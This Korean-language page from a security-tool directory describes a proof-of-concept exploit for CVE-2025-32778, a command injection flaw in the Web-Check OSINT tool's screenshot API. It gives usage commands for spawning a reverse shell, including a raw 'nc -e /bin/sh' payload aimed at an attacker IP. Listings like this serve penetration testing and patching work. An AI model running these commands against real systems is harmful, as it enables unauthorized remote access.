Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32778 — CVE-2025-32778 PoC 악용: Web-Check OSINT 도구의 명령 주입 | Kitploit
도구/GitHubGitHub/00xcanelo/cve-2025-32778
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

CVE-2025-32778 PoC 악용: Web-Check OSINT 도구의 명령 주입

저장소 보기
31491년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32778 - Web-Check 명령 주입 익스플로잇

Critical Language: Python

설명

CVE-2025-32778은 Lissy93의 Web-Check OSINT 도구에서 발견된 심각한 명령 주입 취약점입니다.
인증되지 않은 공격자가 스크린샷 API의 url 매개변수를 통해 임의의 시스템 명령을 실행할 수 있습니다.

이 Python 스크립트는 익스플로잇을 자동화하며 리버스 셸을 생성하거나 사용자 지정 셸 페이로드를 수용할 수 있습니다.


경고

  • 소유하거나 테스트 권한이 있는 시스템에서만 테스트하세요.
  • 무단 사용은 불법이며 윤리적이지 않습니다.

기능

  • Web-Check의 url 명령 주입 익스플로잇.
  • 지원:
    • --lhost와 --lport를 사용한 리버스 셸.
    • --shell을 통한 사용자 지정 셸.
  • URL 정규화.
  • --shell과 --lhost/--lport를 함께 사용하는 것을 방지합니다.

요구 사항

  • Python 3.x
  • Requests 라이브러리:
root@kitploit:~
pip install requests

사용법

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

도구가 리버스 셸을 생성하도록 만들기

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

사용자 지정 셸 페이로드 (원시)

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

도움말 메뉴

root@kitploit:~
python3 cve-2025-32778.py -h

작동 방식

  1. 대상 URL을 scheme://host[:port] 형식으로 정규화합니다.

  2. 페이로드를 준비합니다:

    • --lhost와 --lport를 사용하여 리버스 셸을 생성합니다.
    • 또는 --shell을 사용하여 원시 셸 명령을 사용합니다.
  3. 안전한 URL 주입을 위해 셸 페이로드를 인코딩합니다.

  4. 페이로드와 함께 /api/screenshot/에 HTTP GET 요청을 보냅니다.

  5. 리버스 셸 연결을 기다립니다.


🧑‍💻 저자

00xCanelo
GitHub Profile


참고 자료

  • Web-Check GitHub 저장소 – 취약한 코드가 포함된 원본 프로젝트.
  • CVE-2025-32778 – 명령 주입 취약점을 설명하는 CVE 항목.
도구 다운로드